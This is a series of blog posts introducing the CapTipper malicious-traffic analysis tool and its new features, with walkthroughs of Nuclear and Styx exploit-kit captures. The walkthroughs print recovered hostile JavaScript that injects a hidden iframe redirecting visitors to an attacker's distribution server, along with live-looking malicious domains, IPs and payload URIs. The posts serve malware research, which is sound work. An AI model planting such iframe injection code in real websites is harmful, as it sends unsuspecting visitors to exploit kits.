The new version of CapTipper is here and it includes new and exciting features.
The most important addition being CapTippers new logo 🙂

Thanks to Ira Suris Gurevich for this beautiful work.

I will be presenting the new CapTipper at BlackHat Arsenal USA this week so stop by and say Hi if you’re around.

Another project we are presenting at BlackHat Arsenal is the CuckooSploit, a joint effort of our entire team at Check Point. Will elaborate on this later.

It is strongly advised to read the first and second version update blog posts in order to have a better understanding of what CapTipper is all about.

I am trying to answer as many requests I can regarding new features to include in CapTipper, the most common one being a plugins infrastructure.
So here it is.

Plugins

CapTipper now supports python written plugins that implement the `ConsolePlugin` interface.
All plugins should be placed in the “/plugins/” folder and implement the ‘run()’ function, which is the entry point CapTipper uses.

Hello World example (“my_first_plugin.py”)

from CTPlugin import ConsolePlugin

class my_first_plugin(ConsolePlugin):

    author = "Omri Herscovici"
    description = "Prints Hello World"

    def run(self, args):
        print "Hello World"

Obviously, the plugin interface has access to all the conversations and hosts datasets.

An extensive explanation and examples on how to write a plugin for CapTipper can be found here.

The main repository of CapTipper already includes some plugins for example and if you have an idea for a plugin, do implement it and send it to me or make a PULL request so I can add it to the repository in order to share new functionalities between CapTipper users.

The command ‘plugin’ enables the use of all loaded plugins.

CT> help plugin Launching an external plugin (alias: p) usage: plugin [-l] <*args>     -l – List all available plugins examples:     plugin find_scripts     plugin 1     p find_scripts

List all available plugins:

CT> plugin -l Loaded Plugins (3):  0 : check_host – Checks if a given id’s host is alive  1 : find_scripts – Finds external scripts included in the object body  2 : print_body – Prints the body of a conversation and ungzip if needed

The plugin command can be also used by its alias ‘p’.
Each plugin is assigned with a unique ID, so the use of a plugin can be done either by its name or by its ID.

For example, we can use the ‘check_host’ plugin who has the id ‘0’ assigned to it.
This plugin receives a conversation id as an argument and checks if the domain hosting that conversation URL is alive.
Let’s use the plugin with conversation ’12’:

CT> p 0 12 Checking host grannityrektonaver.co.vu IP:PORT = 173.244.195.17:80 [-] Server is dead

Documentation

Not really a feature but definitely a useful addition to CapTipper.
The CapTipper documentation is comprehensive and details all different aspects of CapTipper.

The documentation is hosted on ReadTheDocs and can be found here

Output log

The output log is a new feature that enables recording all commands and results from the CapTipper console.

CT> output /Users/omriher/Temp/Nuclear-110615.txt Logging to /Users/omriher/Temp/Nuclear-110615.txt

The logging only includes data from after using the ‘output’ command.
In order to stop logging, use ‘stop’ as the second argument.

CT> output stop Stopped logging to /Users/omriher/Temp/Nuclear-110615.txt

Cuckoo PCAP analysis package

Cuckoo Sandbox is a malware analysis framework used to automatically run and analyse malicious files.
CuckooSploit is the second project we are presenting at BlackHat Arsenal, based on Cuckoo Sandbox .
CuckooSploit is an environment for comprehensive, automated analysis of web-based exploits.

By using full web emulation on different combinations of OS/browser/plugin version, CuckooSploit increases the rate of malicious URL detection and presents a reliable verdict, and in some cases, CVE detection.

Originally CuckooSploit accepted URLs, and now thanks to CapTipper, also accepts PCAP files.
The CuckooSploit integrates CapTipper into it in the form of a new Analysis Package.

The analysis package enables Cuckoo to accept PCAP files for analysis, and use CapTipper to revive them, which enables Cuckoo to produce a full flow report on what exactly happened to the machine (including the payload behavior) when infected by a malicious URL.

The analysis package will work on any Cuckoo instance, and can be found here.
CuckooSploit was developed by our team at Check Point, which also includes David Oren, Liran Englender and Ilana Marcus.
CuckooSploit is on GitHub and can be found here. The blog post about CuckooSploit will be added soon to Check Point’s blog.

Using Fiddler SAZ files

There is still no support for using SAZ files in CapTipper natively, but it is possible to do so by converting Fiddler SAZ files to PCAP files using the project fiddler2pcap.
It uses the python scapy library and some of its dependencies, so it’s best to do the conversion on a linux machine.
Also, layer 2 and 3 of the packets aren’t created well using fiddler2pcap but it is easily fixed using tcprewrite.

I added a small bash script that converts all SAZ files in a folder to PCAPs that are readable by CapTipper (Thanks to Yaron Fruchtman).

The script can be found here.

Video Example

I made an analysis example video using CapTipper based to the PCAP files used in the two (first and second) previous blog posts regarding CapTipper.
https://asciinema.org/a/23792/embed?

---

Some more changes and bug fixes were made and can be viewed in the change log.

As always, feedback is much appreciated.

CapTipper on GitHub
omriher@gmail.com
@omriher

CapTipper v0.2 is out, and it includes many new features.
I’m presenting the new version today at BlackHat Arsenal, you are welcome to come watch if you’re around.

A basic principle for CapTipper’s development is to gather as many useful tools and functions for a researcher under its umbrella.
This release introduces quite a few of those, which I hope will help us all save time switching different tools and spend it researching.

If you are not familiar with CapTipper I highly recommend(!) you read the analysis example I presented here,
since I am not going to introduce the main usages, rather just the new features.

CapTipper is a python tool to analyze, explore and revive HTTP malicious traffic.
CapTipper sets up a web server that acts exactly as the server in the PCAP file,
and contains internal tools, with a powerful interactive console, for analysis and inspection of the hosts, objects and conversations found.

The tool provides the security researcher with easy access to the files and the understanding of the network flow,
and is useful when trying to research exploits, pre-conditions, versions, obfuscations, plugins and shellcodes.

• GitHub Project
• Download CapTipper!

Whats New

Command line argument processing

I was asked by quite a few people to add this ability to CapTipper.
These are the currently supported commands:

optional arguments:   -h, –help                           Show this help message and exit   -p PORT, –port PORT                 Set web server port   -d FOLDER PATH, –dump FOLDER PATH   Dump all files and exit   -s, –server-off                     Disable web server   -short, –short-url                  Display shortened URI paths   -r FOLDER PATH, –report FOLDER PATH Create JSON & HTML report   -g, –ungzip                         Automatically ungzip responses   -u, –update                         Update CapTipper to newest version

--dump FOLDERPATH Automatically dump all files from the PCAP.
This was mainly made for people using Cuckoo Sandbox that want to fetch the HTML files created along with other new files.

I have taken the liberty to write a basic Cuckoo processing module that dumps all files from the PCAP and outputs to the Cuckoo log if an EXE file was found.
It can be found here: CapTipper Cuckoo processing module

--ungzip Automatically ungzip all objects, no need to manually ungzip each object anymore.The generated web-server still responds with the original response in case it was gzipped.

--short-url On some cases the URI paths were very long, making the console view a bit more difficult to inspect.This feature displays the URI paths in a shortened convenient version.

--report FOLDERPATH This is a new and exciting feature for creating HTML & JSON reports.The command will produce both .html and .json files in a given folder.
I will elaborate more on this in the following section.

--update Update CapTipper to the current version available on GitHub.

HTML & JSON Report

CapTipper now supports producing HTML reports for convenient view and sharing,
and JSON report for post-analysis information gathering by a third party.

An example HTML report of the Nuclear EK PCAP we analyzed in the first post, can be found here: CapTipper HTML Nuclear Report
The HTML report includes full flow details, client information, interesting binary data and more…

The report is expected to expand and include more information along with the development of CapTipper’s new abilities.

HTML Report screenshots:

File Type Identification

File Type Identification provides “magic”-like analysis of a file’s content to determine its true payload.

It was very important for me to add this feature, and after spending some time trying to find a file identification library that suits CapTipper’s needs (cross-platform, cross-environment, accepts file stream, and does not require too much dependencies), I came up short and decided to write one myself.

It is titled Whatype.
Whatype is an independent file type identification python library.
Check out the GitHub repository here: Whatype.

My initial goal was only to use it as part of CapTipper, so currently it only supports ~50 of the most common and relevant file formats:
Executables, PDF, JAVA, SWF, Silverlight, HTML, ZIP, and more…

The information is displayed both in the `convs’ list and the `info’ command under `MAGIC’:

As I mentioned earlier, I couldn’t find an existing library to suite my needs.
So I would like to use this opportunity to invite the open-source community to contribute to the Whatype project (currently in beta release phase) and help create a broader and more accurate signature base, improve the identification performance and hopefully help serve other developers that encounter the same problem.

PE Info

A basic PE info script.
It’s based on the Malware Cookbook PE scanner and displays interesting and suspicious information regarding a binary file.

It also supports using the ‘-p’ argument to identify packers from the PEiD signature database.

CT> peinfo 14 Displaying PE info of object 14 (8.exe) [139264 bytes]: Meta-data ================================================================================ Size: 139264 bytes MD5: 67291715c45c4594b8866e90fbf5c7c4 SHA1: a86dcb1d04be68a9f2d2373ee55cbe15fd299452 Date: 0x545A5C51 [Wed Nov 05 17:20:17 2014 UTC] EP: 0x401314 .text 0/3 CRC: Claimed: 0x24dec, Actual: 0x2621d [SUSPICIOUS] Resource entries ================================================================================ Name RVA Size Lang Sublang Type ——————————————————————————– RT_ICON 0x22980 0xea8 LANG_NEUTRAL SUBLANG_NEUTRAL RT_ICON 0x218d8 0x10a8 LANG_NEUTRAL SUBLANG_NEUTRAL RT_ICON 0x21470 0x468 LANG_NEUTRAL SUBLANG_NEUTRAL RT_ICON 0x21108 0x368 LANG_NEUTRAL SUBLANG_NEUTRAL RT_ICON 0x20460 0xca8 LANG_NEUTRAL SUBLANG_NEUTRAL RT_GROUP_ICON 0x20414 0x4c LANG_NEUTRAL SUBLANG_NEUTRAL RT_VERSION 0x201b0 0x264 LANG_ENGLISH SUBLANG_ENGLISH_US Sections ================================================================================ Name VirtAddr VirtSize RawSize Entropy ——————————————————————————– .text 0x1000 0x1b5d8 0x1c000 6.635876 .data 0x1d000 0x2128 0x1000 0.000000 .rsrc 0x20000 0x3828 0x4000 4.580442 Version info ================================================================================ Translation: 0x0409 0x04b0 InternalName: ProV FileVersion: 3.07 CompanyName: VSO Software Comments: All rights reserved ProductName: Filmf\xf6rderanstalten ProductVersion: 3.07 OriginalFilename: ProV.exe

Find

The `Find’ command provides regex search (using the Python re library syntax) inside specific/all objects in the PCAP.
This is extremely useful when looking for a string structure, domain, scripts and HTML objects.

To demonstrate, let’s take a look at this PCAP file from the Styx Exploit-Kit: 2014-09-28-Styx-EK-traffic.pcap

$ ./CapTipper.py 2014-09-28-Styx-EK-traffic.pcap –ungzip -short CapTipper v0.2 b08 – Malicious HTTP traffic explorer tool Copyright 2015 Omri Herscovici <omriher@gmail.com> [A] Analyzing PCAP: c:\Research\2014-09-28-Styx-EK-traffic.pcap [+] Traffic Activity Time: Sun, 09/28/14 01:30:59 [+] Conversations Found: [!] Displaying shortened URI paths 0: / -> text/html (0.html) [10.0 KB] (Magic: HTML) 1: /wp-conten…yPhoto.css -> text/css (prettyPhoto.css) [2.7 KB] (Magic: TEXT) 2: /wp-conten…efault.css -> text/css (default.css) [39.0 B] (Magic: TEXT) 3: /wp-conten…/style.css -> text/css (style.css) [9.9 KB] (Magic: TEXT) 4: /wp-conten…50×150.jpg -> image/jpeg (Mississippi-wedding-photographer-Bride-in-field-sully-clemmer-150×150.jpg) [20.5 KB] (Magic: JPG) 5: /wp-conten…50×150.png -> image/png (Vera-Wang-Fall-2014-Fall-pink-coral-circle-large-flower-150×150.png) [43.6 KB] (Magic: PNG) 6: /wp-conten…s/feed.png -> image/png (feed.png) [1.4 KB] (Magic: PNG) 7: /wlkzkir.cgi?default -> text/html (wlkzkir.cgi) [301.0 B] (Magic: HTML) 8: /wp-includ…?ver=1.9.2 -> application/javascript (jquery.ui.effect.min.js) [5.0 KB] (Magic: TEXT) 9: /TbCAgWPudohEQ -> text/html (TbCAgWPudohEQ) [0.0 B] 10: /TbCAgWPud…hEQ/e.html -> text/html (e.html) [11.8 KB] (Magic: HTML) 11: /TbCAgWPud…NDDUG.html -> text/html (qtNDDUG.html) [169.0 B] (Magic: HTML) 12: /TbCAgWPud…AnnQG.html -> text/html (ERAnnQG.html) [4.8 KB] (Magic: HTML) 13: /TbCAgWPud…gBQVI.html -> text/html (gzgBQVI.html) [14.1 KB] (Magic: HTML) 14: /TbCAgWPud…/djIhQ.swf -> application/x-shockwave-flash (djIhQ.swf) [5.1 KB] (Magic: SWF) 15: /TbCAgWPud…2.exe&h=33 -> application/x-msdownload (loader2.exe) [170.6 KB] (Magic: EXE) [+] Started Web Server on http://localhost:80 [+] Listening to requests… Starting CapTipper Interpreter Type ‘open ‘ to open address in browser Type ‘hosts’ to view traffic flow Type ‘help’ for more options CT> hosts Found Hosts:  bridepopmississippi.com (50.63.220.1:80)   ├– / [0]   ├– /wp-content/plugins/complete-gallery-manager/css/prettyPhoto.css [1]   ├– /wp-content/themes/wp-clear321/styles/default.css [2]   ├– /wp-content/themes/wp-clear321/style.css [3]   ├– /wp-content/uploads/Mississippi-wedding-photographer-Bride-in-field-sully-clemmer-150×150.jpg [4]   ├– /wp-content/uploads/Vera-Wang-Fall-2014-Fall-pink-coral-circle-large-flower-150×150.png [5]   ├– /wp-content/themes/wp-clear321/images/feed.png [6]   └– /wp-includes/js/jquery/ui/jquery.ui.effect.min.js?ver=1.9.2 [8]   rabiorik.ru (188.120.251.39:80)   └– /wlkzkir.cgi?default [7]   poolie.vvk49.com (162.244.33.39:80)   ├– /TbCAgWPudohEQ [9]   ├– /TbCAgWPudohEQ/e.html [10]   ├– /TbCAgWPudohEQ/qtNDDUG.html [11]   ├– /TbCAgWPudohEQ/ERAnnQG.html [12]   ├– /TbCAgWPudohEQ/gzgBQVI.html [13]   ├– /TbCAgWPudohEQ/djIhQ.swf [14]   └– /TbCAgWPudohEQ/loader2.exe&h=33 [15] CT> iframes 0 Searching for iframes in object 0 (0.html)… No Iframes Found CT>

A redirection is made to rabiorik.ru, but the ‘iframes’ commands didn’t produce any results. (For the sake of this example, let’s still assume an iframe is used).
Now let’s launch the PCAP again with auto ungzip, and use the ‘find‘ command to look for the TDS in all files:

CT> find all rabiorik Searching ‘rabiorik’ in all objects:  0.html [0]:     (777,50587) : t(){create_frame(“http://rabiorik.ru/wlkzkir.cgi?default”)  wlkzkir.cgi [7]:     (8,256) : 22 (@RELEASE@) Server at rabiorik.ru Port 80</address></b

Here it is.
So why did the ‘iframes’ command come up empty? That’s because ‘iframes’ statically parses the HTML objects in the file, and in this case the iframe is created during run-time.

We can see the domain is being sent to a function called create_frame in object 0, let’s search for it:

CT> find 0 create_frame Searching ‘create_frame’ in object 0 (0.html):  (777,50213) : xt/javascript’>function create_frame(a){var b=document.getEle  (777,50566) : true}}function bdsls4t(){create_frame(“http://rabiorik.ru/wlkz

So we found the create_frame function decleration, let’s take a better look at it, and explore it using the new ‘slice’ command.

Slice

Slice displays a specified range of bytes (substring) from a file.
Following the previous example, we can examine the “create_frame” javascript function by requesting 256 bytes from its starting position.
‘slice’ accepts the object-id (0), the offset start (50213) and the length (256):

CT> slice 0 50213 256 Displaying 256 of bytes from offset 50213 in object 0 (0.html): create_frame(a){var b=document.getElementById(‘weqe’);if(typeof(b)!=’undefined’&&b!=null){} else{var c=document.createElement(‘iframe’);c.id=”weqe”;c.style.width=”0px”;c.style.height=”0px”; c.style.border=”0px”;c.frameBorder=”0″;c.style.display=”none”;c.setA

I also included support for “EOB” (End Of Block) detection.
This will tell ‘slice‘ to display code until the end of the current block we are looking at,
whether it’s a class, a function or a statement (based on braces { }).

The “eob” argument is used instead of the length value, e.g:

CT> slice 0 50213 eob Displaying 334 of bytes from offset 50213 in object 0 (0.html): create_frame(a){var b=document.getElementById(‘weqe’);if(typeof(b)!=’undefined’&&b!=null){} else{var c=document.createElement(‘iframe’);c.id=”weqe”;c.style.width=”0px”;c.style.height=”0px”; c.style.border=”0px”;c.frameBorder=”0″;c.style.display=”none”;c.setAttribute(“frameBorder”,”0″); document.body.appendChild(c);c.src=a;return true}}

If we want to be able to read the code more conviently, we can use the ‘jsbeautify’ command.

JS Beautify

JSBeautify (JavaScript Beautify) reformats the code to be more human-readable, very useful for deep inspection.
It accepts a conversation object and create a new one. (The new object can be dumped to the file system):

CT> jsbeautify obj 8  JavaScript Beautify of object 8 (jquery.ui.effect.min.js) successful!  New object created: 16

It can also accept the ‘slice’ command introduced in the previous section.
Lets use this tool on the “create_frame” function in the javascript code, combined with the ‘slice’ command.

CT> jsbeautify slice 0 50213 512 create_frame(a) {     var b = document.getElementById(‘weqe’);     if (typeof(b) != ‘undefined’ && b != null) {} else {         var c = document.createElement(‘iframe’);         c.id = “weqe”;         c.style.width = “0px”;         c.style.height = “0px”;         c.style.border = “0px”;         c.frameBorder = “0”;         c.style.display = “none”;         c.setAttribute(“frameBorder”, “0”);         document.body.appendChild(c);         c.src = a;         return true     } } function bdsls4t() {     create_frame(“http://rabiorik.ru/wlkzkir.cgi?default”) } try {     if (window.attachEvent) {         window.attachEvent(‘onload’, bdsls4t)     } else {         if (window.onload) {             var curronload = wi

Now we can easily understand what the “create_frame” function does and how it works.

Objects

The ‘objects’ command will display all of CapTipper’s internal objects (automatic and user created), with basic description and references.

ID       – Object ID
CID     – The Conversation ID assosciated with the object
TYPE   – Object type created automatically or by the user (body, ungzip, jsbeautify…)
NAME  – Name of object given by the PCAP or by CapTipper

CT> objects Displaying Objects: ID    CID     TYPE        NAME —- —– ———–   ——– 0   | 0   | body       | 0.html 1   | 1   | body       | prettyPhoto.css 2   | 2   | body       | default.css 3   | 3   | body       | style.css 4   | 4   | body       | Mississippi-wedding-photographer-Bride-in-field-sully-clemmer-150×150.jpg 5   | 5   | body       | Vera-Wang-Fall-2014-Fall-pink-coral-circle-large-flower-150×150.png 6   | 6   | body       | feed.png 7   | 7   | body       | wlkzkir.cgi 8   | 8   | body       | jquery.ui.effect.min.js 9   | 9   | body       | TbCAgWPudohEQ 10  | 10  | body       | e.html 11  | 11  | body       | qtNDDUG.html 12  | 12  | body       | ERAnnQG.html 13  | 13  | body       | gzgBQVI.html 14  | 14  | body       | djIhQ.swf 15  | 15  | body       | loader2.exe 16  | 0   | ungzip     | ungzip-0.html 17  | 1   | ungzip     | ungzip-prettyPhoto.css 18  | 3   | ungzip     | ungzip-style.css 19  | 8   | ungzip     | ungzip-jquery.ui.effect.min.js 20  | 10  | ungzip     | ungzip-e.html 21  | 11  | ungzip     | ungzip-qtNDDUG.html 22  | 12  | ungzip     | ungzip-ERAnnQG.html 23  | 13  | ungzip     | ungzip-gzgBQVI.html 24  | 19  | jsbeautify | jsbeautify-ungzip-jquery.ui.effect.min.js

More new commands:
strings     – Find strings embedded in binary files.
req          – Display raw request of a given conversation
ungzip all – Ungzip all objects in PCAP
update     – Update CapTipper to current version from GitHub.
clear        – Clear the screen

Some refactoring was also done to the project, in order to ease access and allow better usage of CapTipper as a standalone library (not tested yet).

There are many more features to come, any feedback or suggestions are always welcome and much appreciated.

omriher@gmail.com
@omriher

Enjoy!

CapTipper – Malicious HTTP traffic explorer tool

• What is CapTipper
• Analysis Example
• GitHub Project
• Download CapTipper!
• Info

What is CapTipper

---

CapTipper is a python tool to analyze, explore and revive HTTP malicious traffic.
CapTipper sets up a web server that acts exactly as the server in the PCAP file,
and contains internal tools, with a powerful interactive console, for analysis and inspection of the hosts, objects and conversations found.

The tool provides the security researcher with easy access to the files and the understanding of the network flow,
and is useful when trying to research exploits, pre-conditions, versions, obfuscations, plugins and shellcodes.

Feeding CapTipper with a drive-by traffic capture (e.g of an exploit kit) displays the user with the requests URI’s that were sent and responses meta-data.
The user can at this point browse to http://127.0.0.1/[URI] and receive the response back to the browser.
In addition, an interactive shell is launched for deeper investigation using various commands such as: hosts, hexdump, info, ungzip, body, client, dump and more…

Analysis Example

---

Usage: ./CapTipper.py <PCAP_file> [web_server_port=80]

Let’s analyze the following Nuclear EK drive-by infection PCAP 2014-11-06-Nuclear-EK-traffic.pcap

C:\CapTipper> CapTipper.py “C:\NuclearFiles\2014-11-06-Nuclear-EK-traffic.pcap” CapTipper v0.1 – Malicious HTTP traffic explorer tool Copyright 2015 Omri Herscovici <omriher@gmail.com> [A] Analyzing PCAP: C:\NuclearFiles\2014-11-06-Nuclear-EK-traffic.pcap [+] Traffic Activity Time: Thu, 11/06/14 17:02:35 [+] Conversations Found: 0: / -> text/html (0.html) [5509 B] 1: /wp-includes/js/jquery/jquery.js?ver=1.7.2 -> application/javascript (jquery.js) [39562 B] 2: /seedadmin17.html -> text/html (seedadmin17.html) [354 B] 3: /15c0b14drr9f_1_08282d03fb0251bbd75ff6dc6e317bd9.html -> text/html (15c0b14drr9f_1_08282d03fb0251bbd75ff6dc6e317bd9.html) [113149 B] 4: /wp-content/uploads/2014/01/MetroWest_COVER_Issue2_Feb2014.jpg -> image/jpeg (MetroWest_COVER_Issue2_Feb2014.jpg) [350008 B] 5: /images/footer/3000melbourne.png -> image/png (3000melbourne.png) [2965 B] 6: /images/footer/3207portmelbourne.png -> image/png (3207portmelbourne.png) [3092 B] 7: /wp-content/uploads/2012/09/background1.jpg -> image/jpeg (background1.jpg) [33112 B] 8: /00015d76d9b2rr9f/1415286120 -> application/octet-stream (00015d76.swf) [31579 B] 9: /00015d766423rr9f/1415286120 -> application/pdf (XykpdWhZZ2.pdf) [9940 B] 10: /00015d76rr9f/1415286120/5/x00809070554515d565b010b03510053535c0505;1;6 -> application/octet-stream (5.exe) [139264 B] 11: /00015d76rr9f/1415286120/5/x00809070554515d565b010b03510053535c0505;1;6;1 -> application/octet-stream (5.exe) [139264 B] 12: /00015d76rr9f/1415286120/7 -> application/octet-stream (7.exe) [139264 B] 13: /00015d761709rr9f/1415286120 -> application/octet-stream (00015d76.swf) [8064 B] 14: /00015d76rr9f/1415286120/8 -> application/octet-stream (8.exe) [139264 B] [+] Started Web Server on http://localhost:80 [+] Listening to requests… CapTipper Interpreter Type ‘open <conversation id>’ to open address in browser Type ‘hosts’ to view traffic flow Type ‘help’ for more options CT>

The Initialization outputs the conversations found between the client and the server in the following format:

[ID] : REQUEST URI -> SERVER RESPONSE TYPE (FILENAME) [SIZE IN BYTES]
ID: An assigned Id to the specific conversation
REQUEST URI: The URI that was sent to the server in the GET request
SERVER RESPONSE TYPE: The content-type returned in the server response header
FILENAME: The filename can be a few things:
                       1) Filename attribute given in the response header
                       2) Derived from the URI
                       3) Assigned by CapTipper if couldn’t find any of the above
SIZE IN BYTES: Response body size

After Initalization, 2 things occur:

1. CapTipper creates a pseudo-web server that behaves like the web server in the pcap
2. An Interpreter is launched

The interpreter contains internal tools for further investigation of the objects in the pcap.
Opening a URI in the browser is simply by typing ‘open‘ along with the object id

CT> open 0 CT> log [2015-01-09T18:01:28.878000] 127.0.0.1 : GET / HTTP/1.1

• None of the commands (Except ‘open‘) actually requires the server to be running.
  You can turn off the server by typing ‘server off‘ or by adding -s when calling CapTipper.

Let’s see what can we find out without using the browser.

First, we’ll take a bird’s-eye view on the traffic by using the command ‘hosts’

CT> hosts Found Hosts:  www.magmedia.com.au  ├– / [0]  ├– /wp-includes/js/jquery/jquery.js?ver=1.7.2 [1]  ├– /wp-content/uploads/2014/01/MetroWest_COVER_Issue2_Feb2014.jpg [4]  ├– /images/footer/3000melbourne.png [5]  ├– /images/footer/3207portmelbourne.png [6]  └– /wp-content/uploads/2012/09/background1.jpg [7]  pixeltouchstudios.tk  └– /seedadmin17.html [2]  grannityrektonaver.co.vu  ├– /15c0b14drr9f_1_08282d03fb0251bbd75ff6dc6e317bd9.html [3]  ├– /00015d76d9b2rr9f/1415286120 [8]  ├– /00015d766423rr9f/1415286120 [9]  ├– /00015d76rr9f/1415286120/5/x00809070554515d565b010b03510053535c0505;1;6 [10]  ├– /00015d76rr9f/1415286120/5/x00809070554515d565b010b03510053535c0505;1;6;1 [11]  ├– /00015d76rr9f/1415286120/7 [12]  ├– /00015d761709rr9f/1415286120 [13]  └– /00015d76rr9f/1415286120/8 [14]

It seems that www.magmedia.com.au is the compromised site.

By crossing this information and the file types we got in the conversations list, it looks like grannityrektonaver.co.vu is the infecting host.

Then what is pixeltouchstudios.tk ?

Well, knowing how exploit-kits usually work, this is probably the TDS (Traffic Distribution System) server.
Let’s take a closer look.

We can print the header and the body of the page by typing ‘head‘ and ‘body‘:

CT> head 2 Displaying header of object 2 (seedadmin17.html): HTTP/1.1 302 Found Server: nginx Date: Thu, 06 Nov 2014 15:02:38 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 354 Connection: keep-alive Set-Cookie: ehihm=_YocADE3AAIAAgCvjVtU__.vjVtUQAABAAAAr41bVAA-; expires=Fri, 06-Nov-2015 15:03:11 GMT; path=/; domain=pixeltouchstudios.tk Location: http://grannityrektonaver.co.vu/15c0b14drr9f_1_08282d03fb0251bbd75ff6dc6e317bd9.html CT> body 2 Displaying body of object 2 (seedadmin17.html) [256 bytes]: <!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href=”http://grannityrektonaver.co.vu/15c0b14drr9f_1_08282d03fb0251bbd75ff6dc6e317bd9.html”>here</a>.</p> <hr

• By deafult, the body command returns the first 256 byte, you can change it by typing body 2 1000 – this will print the first 1000 bytes

We see that object 2, returns a 302 redirection to the infecting host.
So our hypothesis was probably true.

Let’s get more information on object 2 by typing ‘info‘:

CT> info 2 Info of conversation 2:  SERVER IP   : 108.61.196.84:80  HOST        : pixeltouchstudios.tk  URI         : /seedadmin17.html  REFERER     : http://www.magmedia.com.au/  RESULT NUM  : 302 Found  RESULT TYPE : text/html  FILE NAME   : seedadmin17.html  LENGTH      : 354 B

The referrer to that page was of course magmedia.co.au, but what exactly redirected us?

By looking at the conversations it was probably either the index page or the javascript file.
Let’s have a quick peek at the javascript file (object 1)

CT> body 1 Displaying body of object 1 (jquery.js) [256 bytes]: ▼ ♦♥─╜i{#╟ס╢√}~♣X╓t♥═”HJצg♀░→o½%Y▓╡ם║m┘CR║ @a!▒P ╪כ ╬o?≈‼╣TJ≥£≈\g╞jó╢\”#cן╚πg ÷ry≤~5↔O6םµ╦Vπ├ףף h|╛*ך╞½σh≤6_§ם╧ק╖כa╛ש.↨iπ╦┼á▌רl67¥ππ╤z╘^«╞╟ ÷∞°▀F╖כב▐hלכ═╦σ≥zZ4≤╓▌¢|╒Φg├σαv^,6φב=h╧≤═`╥\¶o ←▀↨π╧▐▌4ףf»≤π╢█h%חy{U▄╠≥A╤

Hmm… What’s going on? Let’s look at the header

CT> head 1 Displaying header of object 1 (jquery.js): HTTP/1.1 200 OK Content-Encoding: gzip Vary: Accept-Encoding Date: Thu, 06 Nov 2014 15:03:41 GMT Server: LiteSpeed Accept-Ranges: bytes Connection: Keep-Alive Keep-Alive: timeout=5, max=100 Last-Modified: Mon, 10 Feb 2014 12:34:10 GMT Content-Type: application/javascript Content-Length: 39562 Cache-Control: public, max-age=604800 Expires: Thu, 13 Nov 2014 15:03:41 GMT

The response is gzipped.
Let’s ungzip it:

CT> ungzip 1  GZIP Decompression of object 1 (jquery.js) successful!  New object created: 15

Great. a new object was created (15). 
Let’s look at it.

CT> body 15 Displaying body of object 15 (ungzip-jquery.js) [256 bytes]: /* Copyright (C) 2007 Free Software Foundation, Inc. http://fsf.org/ */ function getCookie(a){var b=document.cookie.match(new RegExp(“(?:^|; )”+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return b?decodeU RIComponent(b[1]):undefined}(funct

So this is the ungzipped version of the JS file.
Remember, we want to find out what redirected us to the TDS,
Safe to assume it was an iframe, so let’s search for iframes in the new object using the command ‘iframes‘

CT> iframes 15 Searching for iframes in object 15 (ungzip-jquery.js)…  1 Iframe(s) Found!  [I] 1 : http://pixeltouchstudios.tk/seedadmin17.html

There you go, the attacker planted/altered this javascript and made it send the users to the TDS.

Now let’s take a look at the files from the infecting server.
typing ‘convs‘ again will display the conversations:

CT> convs Conversations Found: 0: / -> text/html (0.html) [5509 B] 1: /wp-includes/js/jquery/jquery.js?ver=1.7.2 -> application/javascript (jquery.js) [39562 B] 2: /seedadmin17.html -> text/html (seedadmin17.html) [354 B] 3: /15c0b14drr9f_1_08282d03fb0251bbd75ff6dc6e317bd9.html -> text/html (15c0b14drr9f_1_08282d03fb0251bbd75ff6dc6e317bd9.html) [113149 B] 4: /wp-content/uploads/2014/01/MetroWest_COVER_Issue2_Feb2014.jpg -> image/jpeg (MetroWest_COVER_Issue2_Feb2014.jpg) [350008 B] 5: /images/footer/3000melbourne.png -> image/png (3000melbourne.png) [2965 B] 6: /images/footer/3207portmelbourne.png -> image/png (3207portmelbourne.png) [3092 B] 7: /wp-content/uploads/2012/09/background1.jpg -> image/jpeg (background1.jpg) [33112 B] 8: /00015d76d9b2rr9f/1415286120 -> application/octet-stream (00015d76.swf) [31579 B] 9: /00015d766423rr9f/1415286120 -> application/pdf (XykpdWhZZ2.pdf) [9940 B] 10: /00015d76rr9f/1415286120/5/x00809070554515d565b010b03510053535c0505;1;6 -> application/octet-stream (5.exe) [139264 B] 11: /00015d76rr9f/1415286120/5/x00809070554515d565b010b03510053535c0505;1;6;1 -> application/octet-stream (5.exe) [139264 B] 12: /00015d76rr9f/1415286120/7 -> application/octet-stream (7.exe) [139264 B] 13: /00015d761709rr9f/1415286120 -> application/octet-stream (00015d76.swf) [8064 B] 14: /00015d76rr9f/1415286120/8 -> application/octet-stream (8.exe) [139264 B]

So what do we have here…
looks like we have 1 PDF file, 2 SWF files, and 4 EXE files that were probably downloaded by the shellcode.

We can dump all the files to a folder for deeper inspection using the ‘dump‘ function, we can add ‘-e‘ to refrain from dumping the EXE files, so we won’t accidentally launch them.

CT> dump all c:\NuclearFiles -e  Object 0 written to c:\NuclearFiles\0-0.html  Object 1 written to c:\NuclearFiles\1-jquery.js  Object 2 written to c:\NuclearFiles\2-seedadmin17.html  Object 3 written to c:\NuclearFiles\3-15c0b14drr9f_1_08282d03fb0251bbd75ff6dc6e317bd9.html  Object 4 written to c:\NuclearFiles\4-MetroWest_COVER_Issue2_Feb2014.jpg  Object 5 written to c:\NuclearFiles\5-3000melbourne.png  Object 6 written to c:\NuclearFiles\6-3207portmelbourne.png  Object 7 written to c:\NuclearFiles\7-background1.jpg  Object 8 written to c:\NuclearFiles\8-00015d76.swf  Object 9 written to c:\NuclearFiles\9-XykpdWhZZ2.pdf  Object 13 written to c:\NuclearFiles\13-00015d76.swf  Object 15 written to c:\NuclearFiles\15-ungzip-jquery.js

As you can see, it also dumps the newly created ungzipped javascript file.

We can also examing the files using CapTipper.
Let’s take a look at the first SWF file using ‘hexdump‘.

